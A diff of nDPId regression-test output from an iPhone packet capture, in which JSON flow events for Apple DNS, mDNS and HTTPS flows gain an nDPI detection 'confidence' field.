-00736{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"iphone.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598209,"flow_last_seen":1582454598209,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1582454598209,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":61862,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gspe35-ssl.ls.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"iphone.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598209,"flow_last_seen":1582454598209,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1582454598209,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":61862,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gspe35-ssl.ls.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"iphone.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598212,"flow_last_seen":1582454598212,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1582454598212,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55914,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"iphone.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1582454598212,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1582454598212,"pkt":"xiwDYGpkxGGLNYKpCABFAABEPtIAAP8R93PAqAIRwKgCAdpqADUAMKdbJH8BAAABAAAAAAAACWdzcDg1LXNzbAJscwVhcHBsZQNjb20AAAEAAQ=="}
-00735{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"iphone.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598212,"flow_last_seen":1582454598212,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1582454598212,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55914,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gsp85-ssl.ls.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"iphone.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598212,"flow_last_seen":1582454598212,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1582454598212,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55914,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gsp85-ssl.ls.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"iphone.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598246,"flow_last_seen":1582454598246,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1582454598246,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":51007,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"iphone.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1582454598246,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"ts_msec":1582454598246,"pkt":"xiwDYGpkxGGLNYKpCABFAAA\/VFIAAP8R4fjAqAIRwKgCAcc\/ADUAK6bSYEMBAAABAAAAAAAAB2NhcHRpdmUFYXBwbGUDY29tAAABAAE="}
-00736{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"iphone.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598246,"flow_last_seen":1582454598246,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1582454598246,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":51007,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"captive.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"iphone.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598246,"flow_last_seen":1582454598246,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1582454598246,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":51007,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"captive.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"iphone.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1582454598247,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":252,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":252,"pkt_l4_len":218,"ts_msec":1582454598247,"pkt":"xGGLNYKpxiwDYGpkCABFAADuMPYAAEARw6bAqAIBwKgCEQA19qcA2lqQHhSBgAABAAkAAAAADXAyNi1mbWZtb2JpbGUGaWNsb3VkA2NvbQAAAQABwAwABQABAAARlgAcCWZtZm1vYmlsZQJmZQlhcHBsZS1kbnMDbmV0AMA2AAEAAQAAAA8ABBH4uYzANgABAAEAAAAPAAQR+IMIwDYAAQABAAAADwAEEfiDysA2AAEAAQAAAA8ABBH4g8vANgABAAEAAAAPAAQR+LmkwDYAAQABAAAADwAEEfi5Z8A2AAEAAQAAAA8ABBH4g7LANgABAAEAAAAPAAQR+Lkw"}
-00767{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":54,"source":"iphone.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598205,"flow_last_seen":1582454598247,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1582454598247,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63143,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"p26-fmfmobile.icloud.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.248.185.140"}}
+00793{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":54,"source":"iphone.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598205,"flow_last_seen":1582454598247,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1582454598247,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63143,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"p26-fmfmobile.icloud.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.248.185.140"}}
 00724{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"iphone.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1582454598247,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"ts_msec":1582454598247,"pkt":"xGGLNYKpxiwDYGpkCABFAAD6F4oAAEAR3QbAqAIBwKgCEQA195UA5qzeldOBgAABAAkAAAAAE3AyNi1rZXl2YWx1ZXNlcnZpY2UGaWNsb3VkA2NvbQAAAQABwAwABQABAAARlgAiD2tleXZhbHVlc2VydmljZQJmZQlhcHBsZS1kbnMDbmV0AMA8AAEAAQAAADUABBH4uVfAPAABAAEAAAA1AAQR+LkmwDwAAQABAAAANQAEEfi5J8A8AAEAAQAAADUABBH4uQrAPAABAAEAAAA1AAQR+IOrwDwAAQABAAAANQAEEfi5Z8A8AAEAAQAAADUABBH4uYTAPAABAAEAAAA1AAQR+LmN"}
-00772{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":55,"source":"iphone.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598204,"flow_last_seen":1582454598247,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":270,"flow_avg_l4_payload_len":135,"midstream":0,"ts_msec":1582454598247,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63381,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"p26-keyvalueservice.icloud.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.248.185.87"}}
+00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":55,"source":"iphone.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598204,"flow_last_seen":1582454598247,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":270,"flow_avg_l4_payload_len":135,"midstream":0,"ts_msec":1582454598247,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63381,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"p26-keyvalueservice.icloud.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.248.185.87"}}
 00676{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"iphone.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1582454598248,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":227,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":227,"pkt_l4_len":193,"ts_msec":1582454598248,"pkt":"xGGLNYKpxiwDYGpkCABFAADVXGwAAEARmEnAqAIBwKgCEQA18aYAwXDXjvGBgAABAAQAAAAACmdzcGUzNS1zc2wCbHMFYXBwbGUDY29tAAABAAHADAAFAAEAAAtxACQKZ3NwZTM1LXNzbAhscy1hcHBsZQNjb20GYWthZG5zA25ldADANQAFAAEAAAFNACIKZ3NwZTM1LXNzbAJscwVhcHBsZQNjb20HZWRnZWtlecBUwGUABQABAAARlgAWBWU2OTg3AmU5CmFrYW1haWVkZ2XAVMCTAAEAAQAAAA8ABF9lGTU="}
-00752{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"iphone.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598209,"flow_last_seen":1582454598248,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":113,"midstream":0,"ts_msec":1582454598248,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":61862,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gspe35-ssl.ls.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"95.101.25.53"}}
+00778{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"iphone.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598209,"flow_last_seen":1582454598248,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":113,"midstream":0,"ts_msec":1582454598248,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":61862,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gspe35-ssl.ls.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"95.101.25.53"}}
 00569{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"iphone.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1582454598252,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"ts_msec":1582454598252,"pkt":"xGGLNYKpxiwDYGpkCABFAACEYIUAAEARlIHAqAIBwKgCEQA12moAcAk\/JH+BgAABAAIAAAAACWdzcDg1LXNzbAJscwVhcHBsZQNjb20AAAEAAcAMAAUAAQAADY0AJAlnc3A4NS1zc2wJbHMyLWFwcGxlA2NvbQZha2FkbnMDbmV0AMA0AAEAAQAAAD8ABBGCAi4="}
-00749{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":57,"source":"iphone.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598212,"flow_last_seen":1582454598252,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":72,"midstream":0,"ts_msec":1582454598252,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55914,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gsp85-ssl.ls.apple.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.130.2.46"}}
+00775{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":57,"source":"iphone.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598212,"flow_last_seen":1582454598252,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":72,"midstream":0,"ts_msec":1582454598252,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55914,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gsp85-ssl.ls.apple.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.130.2.46"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598252,"flow_last_seen":1582454598252,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1582454598252,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1582454598252,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1582454598252,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGrHrAqAIREfi5jMWPAbsN6rbUAAAAALDC\/\/8jQQAAAgQFtAEDAwcBAQgKEd\/m0wAAAAAEAgAA"}
 00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"iphone.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1582454598287,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"ts_msec":1582454598287,"pkt":"xGGLNYKpxiwDYGpkCABFAADPyCcAAEARLJTAqAIBwKgCEQA1xz8Au1lGYEOBgAABAAUAAAAAB2NhcHRpdmUFYXBwbGUDY29tAAABAAHADAAFAAEAABGWACoMY2FwdGl2ZS1jaWRyDG9yaWdpbi1hcHBsZQNjb20GYWthZG5zA25ldADALwAFAAEAAAC8AA4LY2FwdGl2ZS1jZG7APMBlAAUAAQAAAOYAFAdjYXB0aXZlAWcHYWFwbGltZ8AawH8AAQABAAAAEQAEEf1pysB\/AAEAAQAAABEABBH9Nco="}
-00754{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"iphone.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598246,"flow_last_seen":1582454598287,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1582454598287,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":51007,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Apple","breed":"Safe","category":"ConnCheck"},"dns": {"query":"captive.apple.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.253.105.202"}}
+00780{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"iphone.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598246,"flow_last_seen":1582454598287,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1582454598287,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":51007,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"ConnCheck"},"dns": {"query":"captive.apple.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.253.105.202"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":60,"source":"iphone.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598373,"flow_last_seen":1582454598373,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1582454598373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55457,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"iphone.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1582454598373,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454598373,"pkt":"xiwDYGpkxGGLNYKpCABFAAA8dgsAAP8RwELAqAIRwKgCAdihADUAKKMQFxsBAAABAAAAAAAABG1lc3UFYXBwbGUDY29tAAABAAE="}
-00727{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"iphone.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598373,"flow_last_seen":1582454598373,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1582454598373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55457,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"mesu.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"iphone.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598373,"flow_last_seen":1582454598373,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1582454598373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55457,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"mesu.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"iphone.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598373,"flow_last_seen":1582454598373,"flow_idle_time":180000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":66,"midstream":0,"ts_msec":1582454598373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"iphone.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1582454598373,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":108,"pkt_l4_len":74,"ts_msec":1582454598373,"pkt":"AQBeAAD7xGGLNYKpCABFAABemlUAAP8RfYTAqAIR4AAA+xTpFOkASu+LAAAAAAABAAAAAAABCF9ob21la2l0BF90Y3AFbG9jYWwAAAyAAQAAKQWgAAARlAASAAQADgAA5mGLNYKpxGGLNYKp"}
-00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"iphone.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598373,"flow_last_seen":1582454598373,"flow_idle_time":180000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":66,"midstream":0,"ts_msec":1582454598373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_homekit._tcp.local"}}
+00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"iphone.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598373,"flow_last_seen":1582454598373,"flow_idle_time":180000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":66,"midstream":0,"ts_msec":1582454598373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_homekit._tcp.local"}}
 00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"iphone.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1582454598373,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":128,"pkt_l4_len":74,"ts_msec":1582454598373,"pkt":"MzMAAAD7xGGLNYKpht1gD8z1AEoR\/\/6AAAAAAAAACCM\/F4KYopz\/AgAAAAAAAAAAAAAAAAD7FOkU6QBKKFMAAAAAAAEAAAAAAAEIX2hvbWVraXQEX3RjcAVsb2NhbAAADIABAAApBaAAABGUABIABAAOAADmYYs1gqnEYYs1gqk="}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598377,"flow_last_seen":1582454598377,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1582454598377,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.25.53","src_port":50576,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1582454598377,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1582454598377,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAG\/2TAqAIRX2UZNcWQAbugppinAAAAALDC\/\/8BIgAAAgQFtAEDAwcBAQgKEd\/nTAAAAAAEAgAA"}
@@ -96,221 +96,221 @@
